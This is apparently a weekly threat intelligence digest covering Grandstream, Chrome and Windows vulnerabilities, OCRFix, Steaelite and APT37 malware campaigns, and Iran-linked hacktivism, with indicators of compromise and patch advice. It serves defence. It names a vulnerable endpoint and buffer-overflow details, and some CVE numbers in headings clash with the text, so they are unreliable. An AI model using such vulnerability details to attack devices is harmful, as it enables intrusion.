Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Rapid7 Discloses Grandstream Flaw CVE-2026-2329 - On 18 February 2026, Rapid7 disclosed a critical vulnerability, CVE-2026-2329, affecting Grandstream GXP1600 series VoIP phones. The issue has a severity score of 9.3 and impacts the following models: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628 and GXP1630. Grandstream fixed the flaw in firmware version 1.0.7.81. At the time of writing, there have been no public reports of the vulnerability being actively exploited.
The vulnerability affects the /cgi-bin/api.values.get endpoint in the device’s web-based API service. This service is exposed over HTTP on TCP port 80 by default and does not require authentication. The endpoint processes a request parameter made up of colon-separated identifiers and copies each one into a 64-byte buffer in memory without checking its length.
By sending an identifier that is longer than expected, an attacker can overwrite nearby memory on the stack, including the return address and program counter. If successfully exploited, this allows remote code execution with root privileges. This could enable an attacker to extract credentials, modify device settings and fully compromise the affected phone.
Google Chrome Patches Three Chrom Vulnerabilities (CVE-2026-2648, CVE-2026-2649, CVE-2025-2650) - On 18 February 2026, Google patched three vulnerabilities in its Chrome web browser, identified as CVE-2026-2648, CVE-2026-2649 and CVE-2026-2650. The fixes were released in Chrome version 145.0.7632.109/110 for Windows and macOS, and version 144.0.7559.109 for Linux. At the time of writing, there have been no reports of these vulnerabilities being actively exploited.
CVE-2026-2648 is a memory corruption flaw in Chrome’s PDFium component that could allow an attacker to write data beyond allocated memory limits using a specially crafted PDF file. CVE-2026-2649 is an integer overflow vulnerability in Chrome’s V8 JavaScript engine that could allow an attacker to corrupt heap memory through a specially crafted HTML page. CVE-2026-2650 is a heap buffer overflow vulnerability in Chrome’s Media component that could also allow heap memory corruption via a specially crafted HTML page.
Microsoft Patches CVE-2025-20817 - On 18 February 2026, core-jmp released a proof of concept for CVE-2026-20817, a vulnerability with a severity score of 7.8 that affects Microsoft Windows 10, Windows 11, Windows Server 2019 and Windows Server 2022. Instead of adding a direct authorisation check, Microsoft addressed the issue by enabling a feature flag that disables the vulnerable functionality. At the time of writing, there have been no public reports of active exploitation in the wild.
The vulnerability exists in the Windows Error Reporting (WER) service and is caused by insufficient authorisation checks in a method exposed through Advanced Local Procedure Call (ALPC) within the file wersvc.dll. The affected method, SvcElevatedLaunch, accepts ALPC messages and creates a privileged process without properly verifying the trust level of the caller. If successfully exploited, a local attacker can cause the system to create a process running with SYSTEM-level privileges.
Potential Threats
OCRFix Campaign Combines ClickFix and EtherHiding to Deliver Multi-Stage Botnet Malware - On 25 February 2026, cybersecurity researchers reported on a phishing campaign known as OCRFix that uses social engineering to infect systems and enroll them into a centrally controlled botnet. The campaign impersonates the legitimate Tesseract OCR software using a lookalike website and tricks victims into manually running malicious PowerShell commands. This method combines two techniques: one that persuades users to execute harmful commands themselves, and another that hides command-and-control information inside blockchain smart contracts to make the infrastructure harder to trace.
The infection begins when victims reach the fake website through search engine manipulation or malicious adverts and are shown a fake verification prompt instructing them to copy and paste a command into PowerShell. This launches a multi-stage infection process that downloads and installs further malware components. The malware disables security protections, creates scheduled tasks to maintain persistence, and registers the infected system with a remote control server. It then collects system information such as device name, operating system and internal network details and regularly checks in for instructions.
The final stage connects to a bot management server that allows the attacker to control infected devices and issue commands, including downloading and running additional payloads. Analysis showed the malware is capable of keylogging, taking screenshots, scanning networks, modifying system settings and evading detection. Some of the infrastructure used in the campaign remains active, indicating the operation may still be ongoing.
Steaelite RAT Employs Credential Theft and Ransomware for Double Extortion Operations - On 24 February 2026, cybersecurity researchers published an analysis of Steaelite, a remote access trojan that has been sold on underground forums since late 2025. The malware is designed to fully compromise infected systems and supports credential theft, file collection, live surveillance, remote command execution and ransomware deployment through a single web-based control panel. It is advertised as difficult to detect on Windows systems and includes features such as hidden remote desktop access, banking application bypass and an Android ransomware module that is still under development.
Once a victim system connects to the attacker’s infrastructure, Steaelite automatically collects stored browser passwords, session cookies and application tokens before any commands are issued. It also sends system information to the control panel, including device name, hardware identifiers and operating system details, giving the attacker real-time visibility of the infected machine. From the control panel, the attacker can browse and manage files, stream the victim’s desktop, access the webcam and microphone, log keystrokes, manipulate clipboard contents, track the device’s location, launch denial-of-service attacks and deploy ransomware for extortion.
Technical analysis showed that the malware can inject itself into other processes, harvest browser data, enumerate running applications and enable elevated privileges. It also includes functions for persistence, disabling security protections, spreading via removable media and removing other malware. Additional capabilities include debugger detection, delayed execution to evade security tools and termination of running processes, indicating the malware is designed for long-term control and surveillance of compromised systems.
APT37 Targets Internet Connected and Air-Gapped Systems with Custom Malware - On 26 February 2026, researchers reported on a December 2025 cyber-espionage campaign known as “Ruby Jumper” carried out by APT37, a threat group linked to North Korea. The campaign targeted politically relevant individuals, including researchers, analysts, journalists and government-affiliated personnel who monitor North Korea–related issues. Evidence suggests the activity aligned with North Korean intelligence interests and also targeted Arabic-speaking audiences using material focused on the Israel–Hamas conflict, indicating broader surveillance beyond the Korean Peninsula.
The campaign began with malicious shortcut (LNK) files that launched PowerShell scripts to install malware in memory. Additional components were used to establish persistence and disguise malicious activity as legitimate software. The attackers relied on trusted cloud services for command-and-control communications to blend in with normal network traffic and avoid detection.
The malware set included tools for infecting removable media and using USB devices to transfer data and commands across isolated or restricted networks. Other payloads provided long-term backdoor access and surveillance features such as keystroke logging, screen and audio capture, file discovery and data exfiltration. Overall, the activity indicates a sustained intelligence-gathering operation focused on politically engaged targets.
General News
Claimed Cyberattacks realting to US-Israel and Iran Continue to Escalate in Jordan - On 1 March 2026, Sophos reported that a pro-Iranian hacktivist group operating under the Telegram channel name “Handla Hack” had claimed responsibility for attacks in Jordan. Analysts assessed with high confidence that “Handla Hack” is simply another name used by the Handala Hack Team, based on overlapping claims against the same victims. Intelligence analysis identified several social media posts in which Handala claimed responsibility for attacks on a Jordanian petrol station and announced future attacks against Saudi Arabia’s cyber infrastructure.
This assessment is consistent with separate reporting that an unidentified threat group had claimed an attack targeting fuel infrastructure in Jordan. The alleged activity in Jordan represents an update to earlier reporting on Iran-linked hacktivist retaliation claims following strikes by the United States and Israel. In separate reporting, Israeli and US media attributed distributed denial-of-service attacks to energy and aviation infrastructure systems. An Iran-linked hacktivist group known as Cyber Islamic Resistance also reportedly claimed to have targeted Rafael Advanced Defense Systems, and cybersecurity analysts confirmed they are tracking all related activity under a campaign referred to as “The Great Epic.”
Anthropic's Claude Experiences Partial Service Outage; No Confirmed Cyberattack - On 2 March 2026, Anthropic reported a partial service outage that disrupted access to Claude.ai, the Claude Console, the Claude API, Claude Code and Claude for Government services. The company initially identified problems affecting the login and logout functions of Claude.ai, and later confirmed that some API methods were also not working as expected. User reports indicated login failures, slow response times and access errors across both the mobile and web versions of Claude. A fix was introduced at 13:22 UTC, and the incident was marked as resolved at 15:47 UTC. At the time of writing, there is no evidence to suggest the disruption was caused by a cyberattack.
UK warns of Iranian Cyber Attack Risks amid Middle-East Conflict - The UK’s National Cyber Security Centre has warned British organisations of a heightened risk of Iranian cyber activity linked to the conflict in the Middle East, particularly for those with operations or supply chains in the region. While there is no immediate increase in direct threats to the UK, the situation could change quickly and Iranian state-linked actors are still believed capable of launching attacks despite domestic internet disruption. Organisations are advised to strengthen their cyber security by following existing guidance on DDoS attacks, phishing and industrial control system threats, reviewing their external attack surface and increasing monitoring. The warning follows similar alerts from US authorities about the growing risk from Iran-aligned hacking groups.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| CL0P Ransomware Group | ● High | → | ● High | ● 81 | → | ● 82 | ● 49 | → | ● 49 |
| Dragon Force Group | ● Moderate | → | ● Moderate | ● 66 | → | ● 65 | ● 49 | → | ● 49 |
| Kazu | NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ● 31 |
| RocketRacoon | NEW | → | ● Basic | NEW | → | ● 30 | NEW | → | ● 25 |
| CipherForce Ransomware Group |
NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 30 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | |||||
|---|---|---|---|---|---|---|---|---|
| Pakistan | ▲ | Medusa Ransomware | ▲ | CVE-2025-2185 | ▲ | Apple | ▲ | |
| SloppyLemming | ▲ | DragonForce | ▲ | CVE-2026-21513 | ▲ | UAE | ▲ | |
| Israel | ▲ | DDoS | ▲ | CVE-2026-1731 | ▲ | Bahrain | ▲ | |
| Islamic Cyber Resistance Group | ▲ |
Identity Theft |
▲ | CVE-2023-3452 | ▲ | Qatar | ▲ | |
| Hezbollah | ▲ | TA0040 | ▲ | CVE-2025-0282 | ▲ | Sharjah | ▲ | |
Prominent Information Security Events
OCRFix Campaign Combines ClickFix and EtherHiding to Deliver Multi-Stage Botnet Malware
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - 14621a2a5513825f058530c8c5f64178003ec4aa5ae6c00bab99161e27c5042e
IOC: URL - 1e81ea2a059f[.]ngrok[-]free[.]app
On 25 February 2026, cybersecurity researchers reported on a phishing campaign known as OCRFix that uses social engineering to infect systems and enroll them into a centrally controlled botnet. The campaign impersonates the legitimate Tesseract OCR software using a lookalike website and tricks victims into manually running malicious PowerShell commands. This method combines user-assisted execution with stealthy command-and-control techniques, including hiding control data inside blockchain smart contracts to make the infrastructure harder to track and disrupt.
Victims are typically lured to the fake site via search engine manipulation or malicious advertising and presented with a fake “verification” or “setup” step that instructs them to copy and paste a command into PowerShell. Executing this command initiates a multi-stage infection chain that downloads additional payloads from remote servers and executes them in memory to reduce on-disk artefacts. The malware disables security features, creates scheduled tasks for persistence, and establishes a unique identifier for each infected host.
Once installed, the malware collects system information such as hostname, operating system version, user privileges and internal network details, and periodically communicates with a control server for instructions. The final stage connects to a bot management panel that allows operators to issue commands, deploy further malware, and update functionality as needed. Capabilities observed include keylogging, screenshot capture, network scanning, system configuration changes and basic evasion techniques. Some command-and-control infrastructure remains active, suggesting the campaign may still be ongoing and capable of onboarding new victims.
Steaelite RAT Employs Credential Theft and Ransomware for Double Extortion Operations
Source: Insikt Group | Validated Intelligence Event
IOC: Hash - b2a8d97da2a653de75d3d1be583910233a81a3794364e19ee4bc352b06b48f36
IOC: IP - 149[.]248[.]11[.]71
On 24 February 2026, cybersecurity researchers published an analysis of Steaelite, a remote access trojan that has been sold on underground forums since late 2025. The malware is marketed as an all-in-one toolkit for cybercriminals, providing full control over compromised systems through a single web-based management panel. It is promoted as being difficult to detect on Windows and includes advanced features such as hidden remote desktop access, banking application bypass techniques and an Android ransomware module that is still under active development.
Once a victim system connects to the attacker’s infrastructure, Steaelite immediately begins harvesting stored browser credentials, session cookies and authentication tokens before receiving any further instructions. It also collects and transmits detailed system profiling data, including device name, hardware identifiers, installed software and operating system information, allowing operators to prioritise valuable targets. The central control panel provides real-time interaction with infected machines, enabling attackers to browse files, stream the desktop, activate the webcam and microphone, log keystrokes, manipulate clipboard data and track approximate location.
From the same interface, operators can execute remote commands, launch denial-of-service attacks and deploy ransomware payloads for extortion. Technical analysis revealed that Steaelite can inject into legitimate processes, enumerate running applications and attempt privilege escalation to maintain deeper system access. It supports multiple persistence mechanisms, disables security protections, spreads via removable media and can remove competing malware from infected systems. Additional features such as debugger detection, delayed execution and forced termination of security-related processes indicate the malware is designed for stealth, resilience and long-term surveillance of compromised hosts.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2026-2329 (Grandstream GXP1600 series) – This vulnerability can be addressed by upgrading affected devices (GXP1610, GXP1615, GXP1620, GXP1625, GXP1628 and GXP1630) to firmware version 1.0.7.81.
- CVE-2026-2648 / CVE-2026-2649 / CVE-2026-2650 (Google Chrome) – These vulnerabilities can be addressed by upgrading Chrome to version 145.0.7632.109/110 for Windows and macOS, and 144.0.7559.109 for Linux.
- CVE-2026-20817 (Microsoft Windows) – This vulnerability can be addressed by applying the latest Microsoft security updates for Windows 10, Windows 11, Windows Server 2019 and Windows Server 2022, which disable the vulnerable functionality.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.